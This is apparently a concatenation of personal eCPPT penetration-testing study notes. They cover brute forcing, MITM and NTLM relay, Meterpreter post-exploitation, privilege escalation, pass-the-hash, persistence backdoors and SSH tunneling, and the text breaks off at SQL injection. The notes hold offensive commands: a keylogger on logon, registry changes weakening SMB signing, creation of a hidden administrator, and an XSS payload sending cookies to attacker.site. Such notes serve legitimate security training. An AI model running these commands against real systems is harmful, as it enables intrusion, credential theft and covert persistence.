Open SMB Shares / Null Sessions
Broadcast Requests
Vulnerabilities related to public exploits

NCrack
Brute forcing tool that can use its own wordlist or have a wordlist specified
Can be used with NMAP so the ports it will attack are already known from the NMAP scan
Within NMAP export the results utilizing the -oN option
From there feed that file into ncrack with the -iN option and give a username and password wordlist
NCrack will automatically look at the NMAP scan, find the ports that it can crack, and then attack those ports on the target machines (you can have
more than one IP address in the report)

EyeWitness
Used to help identify low hanging fruit as it applies to web applications and networking devices
Can figure out if default credentials are being used on HTTP and HTTPS enabled ports
Can be downloaded from GitHub
./setup.sh
to use:
python EyeWitness.py --headless --prepend-https -f urls.txt (this can either be URLs or IP addresses)
When the scan completes it will generate an HTML report with its findings
Also contains --active-scan, which will actively try to log in (be careful of account lockouts)

Rsmangler
Used to generate a wordlist out of a few words (utilizes variations and permutations)
make a wordlist (just a couple of words, maybe two to three)
cat wordlist.txt | rsmangler --file - > wordlist_new.txt
You will see that very quickly the wordlist will increase and give you everything that could possibly be formed from those few words

CeWL
Scrapes a target's website and creates a wordlist
cewl -m 8 http://example.com
The above example will pull all words with a minimum length of 8 characters (the wordlist will be 8 or more characters)
-------------------------------------------------------------------------------- /MITMf Python.txt: --------------------------------------------------------------------------------
MITM HSTS Bypass (have not tested yet)

use mitmf.py

python mitmf.py -i <interface> --spoof --arp --dns --hsts --gateway <gateway> --targets <targets>
ex:
python mitmf.py -i eth0 --spoof --arp --dns --hsts --gateway 192.168.1.1 --targets 192.168.1.2

-------------------------------------------------------------------------------- /More NMAP Tricks eCPPT.txt: --------------------------------------------------------------------------------
NMAP Zombie Scanning

Utilize a zombie to scan systems that are not allowed to be scanned by other systems
We can use this to bypass firewalls / ACLs, or to not
reveal our IP address when scanning a system

First we need to find a zombie machine
To do this we need to use the -O option
ex:
nmap -O -v -n 10.10.10.10
The -O will look at the operating system and we want to see if IP ID Sequence Generation is Incremental
If so we can use that machine as our zombie machine
Now find an open port on that zombie machine
Regular nmap scan on the zombie machine
From there we can scan other systems through our zombie machine
ex:
nmap -Pn -sI <zombie IP>:<zombie port> <target>
In the above example we do not want to send pings from our machine (our original machine, not the zombie), hence -Pn
We are then using a zombie IP and port, which is told with -sI
we can also do any other scans we want
ex:
nmap -Pn -sI 10.10.10.10:135 10.10.10.9 -p- -vv -sC -sV
We can also use just the -p option to look at a single port, or a few ports
(note: -sV and -sC have to talk to the target directly, so those probes come from our own IP and undo the hiding that -sI gives; run them separately if staying hidden matters)


NMAP Bounce Scan

Allows us to use the FTP Bounce Attack, which utilizes the FTP server to access other machines on the internet and can conduct scans
on networks that we may not have access to (internal networks)
To do this we have to use the -b option in nmap
Any scan utilizing the -b option will look like it originated from the FTP server, thus hiding us

NMAP Firewall Rules

To test the rules of firewalls we can use the -sA (ACK scan) option within NMAP; it reports ports as filtered or unfiltered rather than open or closed
You can inspect the packets even further if you also run Wireshark

-------------------------------------------------------------------------------- /Network Security.ctb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/overgrowncarrot1/eCPPT-Notes/9ffd59cb5a94c7b70544cba67c81e8683a370d58/Network Security.ctb -------------------------------------------------------------------------------- /Pillaging.txt: --------------------------------------------------------------------------------
PILLAGING

When
enumerating you are looking for the following things:

Important Files
Credentials
Accounts
IM Logs
Network blocks
Domains
Intranet Servers
Shared Hard Drives
Printers
Repositories

Scripts and Commands for Data Harvesting:

Meterpreter:
sysinfo
getuid
ps
run post/windows/gather/ (there are 106 different possibilities we can run here)
some to look at:
enum_shares
enum_domain_group_users
enum_services (this can be used instead of looking for services in Windows)
enum_domains
enum_chrome (will try and get credentials stored in Chrome)
enum_applications
service --status-all
run winenum
screenshot
screenshare
(all that good stuff you already know)
keyscan_start (after migrating to explorer.exe or winlogon.exe)
winlogon.exe will show you what the user is typing as they log in...
run keylogrecorder -c x (in place of the x do either 0, which is for explorer.exe, 1, which is for winlogon.exe, or 2,
which is no migration; the keystrokes will also be saved)
search -d C:\\Users\\els\\ -f *.kdbx (this will search for KeePass databases)


Shell:
wmic service get caption,startname,state,pathname
net start
net view /domain
net group "Domain Controllers" /domain
net user
net user /domain
net localgroup
net localgroup Administrators
net share
arp -a
ipconfig


Linux Shell:
cat /etc/passwd
-------------------------------------------------------------------------------- /PowerShell Cont..txt: --------------------------------------------------------------------------------
Powershell Cont.

Modules:
A set of PowerShell functionalities grouped together in the form of a single file that will typically have a .psm1 extension
Comprised of several components
PS C:\> Get-Module
This will show the currently imported modules for the current PowerShell session
PS C:\> Get-Module -ListAvailable
Returns a list of modules that are available for use
PS C:\> Import-Module .\module.psm1
This will import a module that you select
To use PowerSploit
GitHub link:
https://github.com/PowerShellMafia/PowerSploit/archive/master.zip
Now copy the PowerSploit module into a module path
To see current paths
$ENV:PSModulePath
C:\users\user\Documents\WindowsPowerShell\Modules
Create a PowerSploit folder
Before downloading or executing PowerSploit make sure to allow it through AV (it is signatured by most AV products)
Extract PowerSploit with 7zip
Now import the PowerSploit module
Import-Module PowerSploit
Get-Module
Get-Command -Module PowerSploit
We can see a lot of different things that PowerSploit can do
Get-Help Write-HijackDll
This will show a help screen for that function
-------------------------------------------------------------------------------- /Powershell.txt: --------------------------------------------------------------------------------
Powershell for Pentesters:

Powershell version 5.0 is harder to manipulate
Slides say we will be working mostly with 1.0 and 2.0

Powershell CLI:

Provides access to built in:
cmdlets
modules
functions
features
provides a way to create tasks, functions, variables interactively


Shortcut for powershell (if cmd line is not opening powershell)
"%appdata%\Microsoft\Windows\Start Menu\Programs\Windows Powershell" directory


Powershell executable if the shortcuts are unavailable:
"C:\Windows\System32\WindowsPowerShell\v1.0" or whatever version you are using
If you're operating on a 64-bit system the 64-bit PowerShell can be found at the following
"C:\Windows\System32\WindowsPowerShell"

On a 64-bit system the 32-bit PowerShell lives under the WOW64 directory (SysWOW64 holds the 32-bit binaries, despite the name):
"C:\Windows\SysWOW64\WindowsPowerShell" directory

To see if the current PowerShell process is 32 or 64 bit you can use the following inside PowerShell
[Environment]::Is64BitProcess
If it returns True it is 64-bit, if False it is 32-bit ([Environment]::Is64BitOperatingSystem answers the same question for the OS itself)

32 and 64 bit PowerShell executables can be found at
"C:\Windows\System32\WindowsPowerShell\*" (64-bit) and "C:\Windows\SysWOW64\WindowsPowerShell\*" (32-bit)

When possible try and launch powershell as an administrator

/? for help (or -Help)

Basic Usage (from command line opening powershell. All commands will start with powershell.exe)

Some of the following are scripts that we can see if we can run; the execution policy can be disabled with the "Bypass" or "Unrestricted" arguments (the execution policy is a safety check against running scripts by accident, not a security boundary)
powershell.exe -ExecutionPolicy Bypass .\script.ps1
powershell.exe -ExecutionPolicy Unrestricted .\script.ps1
To hide the powershell window
powershell.exe -WindowStyle Hidden .\script.ps1
To specify a command or script block to run
-Command Get-Process
-Command "& { Get-EventLog -LogName security }"
To execute base64 encoded scripts or commands (the command must be UTF-16LE encoded before it is base64 encoded)
-EncodedCommand $encodedCommand
To not load any powershell profiles (this can help us because no profiles are loaded that may have different security features in them)
-NoProfile .\script.ps1
Version
-Version 2 (this will downgrade the version of Powershell to version 2; this requires that older versions are installed on the system you are attacking, and the downgrade sidesteps version 5 features such as script block logging)

Get-Help:
We can use the Get-Help cmdlet to obtain a manual page on different parts of powershell
example:
Get-Help Get-Process -Full
To see examples of how to use a specific cmdlet we can use -Examples
example:
Get-Help Get-Process -Examples
Get-Help Get-Process -Online (this will show you an online
page for that cmdlet)
Update-Help (will update the local help manual)

CMDLETS:
These are light-weight PowerShell commands that perform a single function
Native commands in PowerShell (we can also create our own)
example:
Get-Process | Sort-Object -Unique | Select-Object ProcessName
Get-Process | Sort-Object -Unique | Select-Object ProcessName > uniq_process.txt (to output what you got to a file)
Using Get-Process by itself will give you a summary of the processes that are running
To get a better understanding of what is running
Get-Process | Format-List *
We can then further extend this information to get information about specific processes and paths to their executables
Get-Process chrome, firefox | Sort-Object -Unique | Format-List Path
We can also get process paths and PIDs
Get-Process chrome, firefox | Sort-Object -Unique | Format-List Path, Id
There are also aliases for different commands, such as Get-ChildItem, which can be run by typing ls
To see what aliases we can use
Get-Alias -Definition Get-ChildItem
This will bring back three different commands we can use: ls, dir and gci
Another alias we will see often is select (which is the alias for Select-Object)
Get-WmiObject -Class win32_operatingsystem | select -Property *
For Format-List we can use fl
Get-WmiObject -Class win32_service | Sort-Object -Unique PathName | fl PathName
We can also save the information we are gathering with Export-Csv (pipe the objects themselves into it, not Format-List output; formatted output exports as formatting objects instead of data)
Get-WmiObject -Class win32_service | Select-Object * | Export-Csv C:\host_info.csv
To access Windows Registry hives
cd HKLM:\
Select-String can be used to help us find different types of documents
Select-String C:\users\user\Documents\*.txt -Pattern pass*
We can then use Get-Content to display the information within a file (like cat)
Get-Content C:\Users\user\Documents\passwords.txt

-------------------------------------------------------------------------------- /PrivEsc and Maintain Access.txt: --------------------------------------------------------------------------------
Post Exploitation:
Privilege Escalation and Maintaining Access

getpid in meterpreter only shows the PID of the process we currently live in; to move to a different process use migrate <pid>, or run post/windows/manage/migrate to let a script pick one automatically
Migrating will not increase privileges; privs will stay the same, just the process will be changed
this could be useful if you are using a web exploit and you want to make sure the session survives if the user closes the webpage

The easiest way to increase privs is to utilize getsystem in meterpreter which will try and automatically increase privs
By default getsystem tries all the different techniques in meterpreter, however if you want to run a certain technique use -t x (where x = the number of the technique to run)
Depending on current privileges on the machine you may not be able to use getsystem
IF UAC IS ENABLED ON A REMOTE SYSTEM AND OUR SESSION IS NOT ELEVATED, GETSYSTEM WILL NOT WORK
TO BYPASS, USE A bypassuac MODULE
post/windows/gather/win_privs
If UAC Enabled is set to True then the remote system has UAC enabled
search bypassuac
a few options should come up
bypassuac_vbs module is the newest module at the time of writing
we have to set the session ID to tell it which session to run on
run the module
If we can bypass everything then we will get another, elevated meterpreter shell, and from there getsystem can take us to SYSTEM on that target machine
Remember UAC still exists, we just bypassed it for the time being

After you have increased your privileges you can utilize incognito
This has been migrated into metasploit
load incognito
after loading incognito we can view and impersonate tokens
list_tokens -u
impersonate_token <token>

Unquoted Service Paths
This is another method we can use for persistence or for
escalating our privileges
The issue arises when a Windows service has been configured with a path to a service binary which is unquoted and contains spaces
Pretty much if there are spaces in an unquoted path, Windows tries each space-delimited prefix of the path as a program name before the real one, so you can hijack it
Example:
C:\Program Files(x86)\Canon\My Scan Utility\ryan.exe
The above example gives us 2 options in regard to an executable we can drop and in which directory
C:\Program.exe
C:\Program Files(x86)\Canon\My.exe
We can make a Program.exe or a My.exe and it will launch instead of running ryan.exe (we also need write access to that directory, and the service has to be restarted, or set to start automatically and the box rebooted, before our binary actually runs)

How to check for Unquoted Service Paths
Use the WMI Command Line Tool (WMIC) to query for all services and paths, specifically searching for unquoted
paths, with the following command line:
C:\> wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
We can also use the "sc" Service Control command with the "qc" (show config) option to query a specific service and manually check for an unquoted path
How to check automatically with Metasploit
use exploit/windows/local/trusted_service_path
We need to know both ways because Metasploit may not always work to find and exploit unquoted service path vulnerabilities

LINUX PRIV ESC
The above is all Windows attacks, now we are going to focus on Linux

The best way to gain priv esc is to look up the current OS and kernel version and then search for publicly available exploits
eCPPT focuses a lot on actual OS exploits, looking up the OS on the web and finding exploits on the web for those version numbers

For the OS attacks, when finding the exploits we may need to compile them ourselves.
The above scenario also assumes that you already have a session with the target machine
Utilizing Metasploit we are able to upload the exploit that was found after it is compiled
upload <exploit> .
MAKE SURE TO PUT THE .
AT THE END
go back into shell
make sure you are root
IF THE TARGET MACHINE DOES NOT HAVE GCC WE CANNOT COMPILE THE EXPLOIT THERE AND WE HAVE TO DO IT LOCALLY
IF OUR operating system is 64-bit and the target machine is 32-bit we need to set the GCC parameters
In order to compile an exploit such as this you would have to do it within the Kali CLI
gcc -m32 -o linux_priv_esc 37292.c (or whatever the exploit is)
(compiling with -m32 needs the 32-bit libc development files installed on Kali, and the result still depends on the target's libc version; a static build, gcc -m32 -static, travels better)
You should now have a file called linux_priv_esc
Make sure that it is executable
Now we can upload that exploit to our target machine utilizing meterpreter
again make sure the file permissions are executable
From there go back into shell
whoami and you should be root

OTHER WAYS TO GET HIGHER PRIVS ON A MACHINE
Explore permissions on processes running on the machine
sudo -l
suid find (which is on the desktop for me)
ps (in Windows, to see if printer services, which run as NT AUTHORITY\SYSTEM, can be migrated to)
We can also escalate privileges by replacing files like DLLs or executables
This may happen if you have the rights to write or edit files used by a service or process
One of the examples that eCPPT gives is the following
An executable is running with system privileges and its executable is stored in a folder on which we have write permissions
We can change the file utilizing msfvenom, or inject the file with something like Shellter, BDF and so on
We can then try and restart the service (the class states through a DoS attack, however there may be other ways)

MAINTAINING ACCESS:

Once you get into the system and become root, or SYSTEM, we need to keep those privileges through persistence
Some ways to maintain access
RDP or VNC
If there are not any such services we need to activate the services
If you have to make a new user you have to add them to the proper groups

PASSWORD HASH RECOVERY
Once in a system we can do
load kiwi
from there we can do a hashdump and try to crack those hashes
We now have a username and hash that we are able to continue to use to get into the system
We may also be able to "run hashdump" depending on the version of meterpreter you have (which will do a little further digging)
If we get permission denied, we may need to migrate to another process (one running as SYSTEM)
If we get priv_passwd_get_sam_hashes: Operation failed.... run hashdump and try to migrate to another process

CRACK HASHES/PASS THE HASH
If we are unable to crack hashes we may need to try and do pass the hash
psexec can utilize either passwords or pass the hash (SMBPass accepts the LM:NTLM hash string in place of a password)
use exploit/windows/smb/psexec
There can be problems with pass the hash
If an account is not the built-in administrator (RID-500) but is within the Administrators group, pass the hash will most likely not work over the network
We will most likely get a STATUS_ACCESS_DENIED (Command=117 WordCount=0)
The above deny status tells us that most likely the registry needs to be changed (UAC remote restrictions strip the admin token from local accounts other than RID-500 when they log on over the network)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Add a new DWORD (32-bit) named
LocalAccountTokenFilterPolicy and set its value to 1
Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LocalAccountTokenFilterPolicy -Value 1 -Type Dword
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters
add a new DWORD (32-bit) named RequireSecuritySignature and set its value to 0
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\LanManServer\Parameters -Name RequireSecuritySignature -Value 0 -Type Dword

WE CAN ALSO USE THE REG COMMAND TO ACCOMPLISH THE SAME THING

C:\> reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

C:\> reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters" /v RequireSecuritySignature /t REG_DWORD /d 0 /f

THE REG CHANGES MAY ALLOW FOR NON RID-500 USER ACCOUNTS TO SUCCESSFULLY PASS-THE-HASH IN SOME CASES (making them requires admin access on the target already, so this is about keeping access, not getting it)

TO USE PASS-THE-HASH WITH RDP WE CAN USE "xfreerdp" (the target must have Restricted Admin mode enabled for this to work)
To do this do the following
xfreerdp /u:(username) /d:(domain name such as foocorp) /pth:(NTLM hash) /v:(IP address)
xfreerdp /u:admin /d:foocorp /pth:<hash> /v:192.168.1.2

TO USE MIMIKATZ ON A 64-BIT TARGET WE MUST BE IN A 64-BIT PROCESS
This means that when we do a sysinfo, if the meterpreter architecture does not match the system we need to migrate to a 64-bit process
Remember to see processes use the ps command
to migrate use migrate <pid>
After we load mimikatz (or kiwi) we may be able to use the wdigest command (creds_wdigest in kiwi) to see plain text passwords

USING WINDOWS CREDENTIALS EDITOR
THIS IS A WINDOWS BINARY, SO WE WILL HAVE TO UPLOAD IT TO THE REMOTE MACHINE WITH METERPRETER
execute -i -f wce.exe -a -h
THEY DID NOT DIG ANY DEEPER INTO THIS IN THE LESSONS, HOWEVER IT MAY BE USEFUL INFORMATION

ENABLE RDP SERVICE
To see what is already running on a machine use the following command
shell
net start
we may see that Remote Desktop Configuration, services and other things are on
ANOTHER WAY TO SEE WHAT IS RUNNING ON A WINDOWS MACHINE
wmic service where 'Caption like "Remote%" and started=true' get Caption
USING METERPRETER SCRIPTS TO CHECK SERVICES
run service_manager -l
run post/windows/gather/enum_services
IF RDP IS DISABLED DO THE FOLLOWING IN METERPRETER
run getgui -h
run getgui -e
if a username and password is known
the -u and -p options can also be used to create that user with RDP access
When we do the above commands RDP is enabled and it will start automatically with the system
GRANTING RDP PERMISSIONS IF A USER IS NOT ALLOWED TO UTILIZE RDP
From the Windows shell run the
following
net localgroup "<group>" <user> /add
net localgroup "Remote Desktop Users" els_user /add
From here we can now try and establish an RDP session with the target machine
to see what groups exist and who is in them do the following
net localgroup
net localgroup "Remote Desktop Users"
net localgroup "Administrators" <user> /add
net localgroup "Administrators" stduser /add
this would add stduser to the Administrators group, thus increasing their privileges on the machine
We could do this for many different groups, such as putting users in the TelnetClients group and more

BACKDOOR

THE SCRIPT THAT IS SHOWN IN THE COURSEWARE ONLY WORKS ON WINDOWS MACHINES

In meterpreter run the following
run persistence -h
run persistence -A -X -i 5 -p 8080 -r <Kali IP>
The above script does the following
-A starts a handler on the Kali machine
-X start the agent at boot
-X requires SYSTEM privs on the machine
-i 5 attempt to connect every 5 seconds
-p port you want to connect back to
-r Kali Linux IP address
After this script has been run we can see that everything went through, and see where the file went with meterpreter
reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v <value name>
the value name was shown when you ran the script above, and will be a bunch of random letters
From here in Data we can see where the file is located
Now we need to run a multi handler exploit
use exploit/multi/handler
make sure you use the same payload and options as you did with the backdoor
If we were to craft our own backdoor with MSFVenom you can upload the file through meterpreter
upload <local file> <remote path>
upload /root/my_bd.exe C:\\windows\\
Now edit the Windows registry key to load the file at startup (this can again be done in meterpreter)
reg setval -k <key> -d <data> -v <value name>
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -d "C:\Windows\my_bd.exe" -v bd_name

NOW CREATE A NEW USER
In the Windows shell do the following
net user <username> <password> /add
net user newuser newpass /add
net localgroup "Administrators" <username> /add
net localgroup "Administrators" newuser /add
This will create a new user and allow us to put that user in the Administrators group, thus creating persistence (a new local admin is also one of the noisiest persistence choices; the security event log records both the account creation and the group change)

DLL HIJACKING / PRELOADING
This is done in the labs by writing a DLL to a location a user can write to, which a higher privileged process then loads, escalating us to SYSTEM privs
-------------------------------------------------------------------------------- /Responder and MultiRelay MITM SMB hash attacks.txt: --------------------------------------------------------------------------------
MITM LLMNR and NBT-NS

Responder/MultiRelay are used for hash relays
Responder answers LLMNR/NBT-NS name lookups that fail, for instance when someone accidentally types the wrong SMB server name
Responder will act as if it is the SMB share the user is looking for and obtain the username and NTLM challenge-response hash

For the relay attack to work SMB signing must be disabled on the relay target
We can see this through an NMAP scan (smb-security-mode script) or by using RunFinger.py
python RunFinger.py -i <target or range>

To launch the responder/multirelay attack

Modify the Responder.conf configuration file
set the SMB server and HTTP server to Off (so MultiRelay can bind those ports itself)

launch Responder.py with -I (interface)
We can also downgrade to LM hashes, if the client supports it, with --lm
python Responder.py -I eth0 --lm
Open a new terminal window
python MultiRelay.py -t <target> -u ALL
-------------------------------------------------------------------------------- /SMB Enumeration.txt: --------------------------------------------------------------------------------
NetBIOS Study Guide

nbtstat -n (within Windows; lists the local NetBIOS name table)
nbtstat -a <remote name> (within Windows; lists the remote machine's name table)
net view (within Windows)
net use K: \\<target>\C$ (in Windows)
This will map drive letter K to the C$ share on the remote machine


nbtscan -v <target or network> (in Kali)
-v is used for verbose
can also scan an entire network (such as a /24)



NULL SESSIONS

These are some of the oldest attacks against SMB
They are used against Windows NT and Windows 2000
Null Sessions return information without any authentication process

To see if a system is vulnerable to a null session on Windows
net use \\<target>\IPC$ "" /u:""
If the command completes successfully it is vulnerable

In the above command we have an empty (anonymous) username and no password

TOOLS USED ON WINDOWS
winfingerprint
winfo <target> -n
DumpSec (formerly known as DumpAcl)

TOOLS USED ON LINUX
enum4linux
rpcclient (must first have a connection established to the remote machine)
rpcclient -N -U "" <target>
-N states do not ask for a password
-U is the username, in this case null (nothing/empty)
To get users using rpcclient
enumdomusers
RPCCLIENT Useful Commands
enumalsgroups
srvinfo
lookupnames
queryuser
enumprivs
-------------------------------------------------------------------------------- /SNMP Enumeration.txt: --------------------------------------------------------------------------------
SNMP ENUMERATION

Four types of SNMP commands used
Read
Write
Trap
Traversal Operations
Works on UDP ports 161 (agent) and 162 (traps)

SNMP attacks
Flooding
Community string guessing
Brute Force

The easiest way to obtain a community string is to sniff SNMPv1 and SNMPv2c traffic
Both utilize clear text communications (only SNMPv3 adds authentication and encryption)

After getting a valid community string there are many tools that can be used
snmpwalk (part of the net-snmp suite)

ex:
snmpwalk -v 2c -c public <target>

-v selects the SNMP protocol version (here 2c); it is not a verbose flag
-c sets the community string to public

If you get output like iso.3.6.1.x.x.x instead of readable object names:
do the following
install
snmp-mibs-downloader
comment out (#) the "mibs :" line in /etc/snmp/snmp.conf so the downloaded MIBs get loaded

snmpset (a tool used to request to either set or change information on a network entity; needs a read-write community string)

NMAP SNMP TOOLS
NMAP comes with a few built in scripts for SNMP
snmp-brute
snmp-info
snmp-interfaces
snmp-netstat
snmp-processes
snmp-sysdescr
snmp-win32-services
/usr/share/nmap/scripts$ ls -l | grep -i snmp

nmap -sU -p 161 --script=<script> <target>

nmap -sU -p 161 --script snmp-brute --script-args snmp-brute.communitiesdb=<wordlist> <target>
a wordlist you can use:
/usr/share/seclists/Misc/wordlist-common-snmp-community-strings.txt
-------------------------------------------------------------------------------- /SSH Tunneling.txt: --------------------------------------------------------------------------------
Secure shell tunneling

Can be used outside a network or inside a network
SSH Tunneling will encrypt traffic as it sends it through
Outside of our network:
ssh -L <local port>:<remote host>:<remote port> username@sshserver
let's say we wanted to connect to telnet through ssh
ssh -L 3000:215.15.1.1:23 root@test
We opened port 3000, passed the traffic to the remote host (IP or domain name), told it what port
and lastly gave it a username and SSH server to connect to
Once the tunnel is up and running we would have a local port 3000 listening on our machine
telnet 127.0.0.1 3000
the traffic will be encrypted between us and the SSH server because it goes through the SSH tunnel (from the SSH server on to 215.15.1.1 it is plain telnet again)

Inside of our network we can also create tunnels to other machines that have services running on their local ports
I have seen mysql running on 127.0.0.1:3306 many times, we can tunnel ourselves to there!
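Finding those loopback-only services is the part the notes leave to eyeballing. The following is an added example, not part of the original notes: a POSIX shell script that reads the listing "ss -ltn" prints on the SSH server (SAMPLE_SS is a constructed listing; the ports and addresses are made up), keeps only sockets bound to 127.0.0.0/8 or ::1, and turns each one into the matching ssh -L command. The user name and IP in the usage line are the notes' own test@192.168.231.3; the -N flag is my addition (it opens no remote shell, only the forward).

```shell
#!/bin/sh
# Added example: list services on an SSH server that are bound to loopback
# only (unreachable from the network, reachable through an SSH local forward)
# and print the "ssh -L" command for each. Input is "ss -ltn" output copied
# from the SSH server. The sample listing below is constructed.

SAMPLE_SS='State   Recv-Q  Send-Q   Local Address:Port   Peer Address:Port
LISTEN  0       128      127.0.0.1:3306       0.0.0.0:*
LISTEN  0       128      0.0.0.0:22           0.0.0.0:*
LISTEN  0       511      [::1]:6379           [::]:*
LISTEN  0       128      127.0.0.1:8080       0.0.0.0:*
LISTEN  0       128      *:80                 *:*'

# loopback_ports < ss-output -> one port per line, ascending, for listeners
# whose local address is 127.x.x.x or [::1]. Sockets on 0.0.0.0, * or [::]
# are reachable directly and need no tunnel, so they are dropped.
loopback_ports() {
    awk '$1 == "LISTEN" {
            addr = $4
            n = split(addr, parts, ":")          # port is the last ":" field
            port = parts[n]
            host = substr(addr, 1, length(addr) - length(port) - 1)
            if (host ~ /^127\./ || host == "[::1]") print port
        }' | sort -n | uniq
}

# tunnel_commands USER HOST [FIRST_LOCAL_PORT] < ss-output
# One "ssh -N -L" per loopback-only port; local ports are handed out in order
# starting at FIRST_LOCAL_PORT (default 3000, as in the notes' mysql example)
# so several services can be forwarded without the local ports clashing.
tunnel_commands() {
    user=$1; host=$2; lport=${3:-3000}
    loopback_ports | while read -r port; do
        echo "ssh -N -L ${lport}:127.0.0.1:${port} ${user}@${host}"
        lport=$((lport + 1))
    done
}

# usage on the sample: printf '%s\n' "$SAMPLE_SS" | tunnel_commands test 192.168.231.3
# prints, for example: ssh -N -L 3000:127.0.0.1:3306 test@192.168.231.3
```

The remote side of each forward is 127.0.0.1 because that address is resolved by the SSH server, not by us; that is exactly why a service the admin "locked down" to loopback becomes reachable once you have any SSH login on the box. If "ss" is missing on an older target, "netstat -ltn" prints the same columns and the script accepts it unchanged.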
For instance our machine IP is 192.168.231.2
SSH server machine IP is 192.168.231.3
When the mysql server is set to only allow local connections (127.0.0.1) we may be able to do the following
ssh -L 3000:localhost:3306 test@192.168.231.3
(localhost here is resolved by the SSH server, not by us, which is why the loopback-only service becomes reachable)
Now we should have a listening connection on port 3000
mysql -h 127.0.0.1 -P 3000 -u root (or whatever the username may be)
-------------------------------------------------------------------------------- /XSS.txt: --------------------------------------------------------------------------------
INE XSS

Vulnerable Web Applications
use unfiltered user input to build the output content
this lets attackers control the output HTML and JavaScript code (allowing for application attacks)
User input can be the following
Request headers
cookies
form inputs
POST parameters
GET parameters

Why use XSS
make browsers load malicious content
perform operations on the attacker's behalf, such as buying products or changing passwords
steal session cookies for impersonation

Testing for XSS
In a user input field you can try different parameters, such as scripts
One easy way to test is to use <i>test</i>
if test comes out in italics, the input is reflected without encoding and XSS can occur
after such a test make a script

The URL may show the following, and a popup window may appear if XSS is allowed
www.example.com/search.php?find=<script>alert(document.cookie)</script>
this will display the session cookie
Send it to the attacker's website
<script>new Image().src="http://attacker.site/log.php?c="+document.cookie;</script>
This will generate an image object and point the src to a script on the attacker's server (attacker.site), with the cookie in the query string
The browser cannot tell if the img is real or not, and loads the img.
Nothing actually shows up because there is no image
a log.php file can be used to save the cookie on attacker.site

Hack.me is a website to practice XSS

VIDEO IS AWESOME, WATCHING IT A FEW TIMES AND DOING THE LABS
--------------------------------------------------------------------------------
/eCPPT Labs Network Security.ctb.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/overgrowncarrot1/eCPPT-Notes/9ffd59cb5a94c7b70544cba67c81e8683a370d58/eCPPT Labs Network Security.ctb.pdf
--------------------------------------------------------------------------------
/eCPPT Labs.ctb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/overgrowncarrot1/eCPPT-Notes/9ffd59cb5a94c7b70544cba67c81e8683a370d58/eCPPT Labs.ctb
--------------------------------------------------------------------------------
/ineBurpSuite.txt:
--------------------------------------------------------------------------------
INE BurpSuite

Is an intercepting proxy
allows an attacker to analyze and modify any request, and any response, exchanged between an HTTP client
and server

Most used web application proxies
Burp Suite
ZAP

Burp Suite allows for
Interception of requests and responses between browser and web server
building requests manually
crawling a website by automatically visiting every page in a website
fuzzing web applications by sending them patterns of valid and invalid inputs to test behavior

Configuring Burp Suite

start the Burp Suite proxy
open Burp Suite
point the browser at the proxy listener (127.0.0.1:8080 by default) and make sure intercept is on
To check what Burp Suite is collecting
on the Proxy > History tab
in the Target > Site Map tab

Burp Repeater
lets you manually build raw HTTP requests
provides the following
syntax highlighting
raw and
rendered responses
integration with other Burp tools
Can also be used to try different usernames and passwords by hand; the captured login request also shows the username and password parameter names you need when handing the attack to hydra
Repeater is used to show how an application will behave with different parameters

You can also set a target that will allow you to just attack that one target

Turn on server response interception
Proxy
Options
Intercept Server Responses (make sure it is checked so responses go through Burp)

Add items to scope to only intercept those URLs

When intercept is off, traffic still passes through the proxy and Burp still records it in the history and site map

Within Target > Site Map, black items are pages you have actually visited
The grey items are ones Burp found on its own (linked from pages you visited, but not yet requested)

To have Burp crawl a target you can use the Spider tab
Spider was free in older versions of Burp; newer versions replaced it with a crawler that is only in the Pro edition

There are a couple of labs that you should do for Burp Suite, especially if you have never used it before.
--------------------------------------------------------------------------------
/ineSQL.txt:
--------------------------------------------------------------------------------
SQL INJECTION

SQL Syntax
> SELECT <columns> FROM <table> WHERE <condition>;

> SELECT 22, 'string', 0x12, 'another string';

UNION COMMAND
>
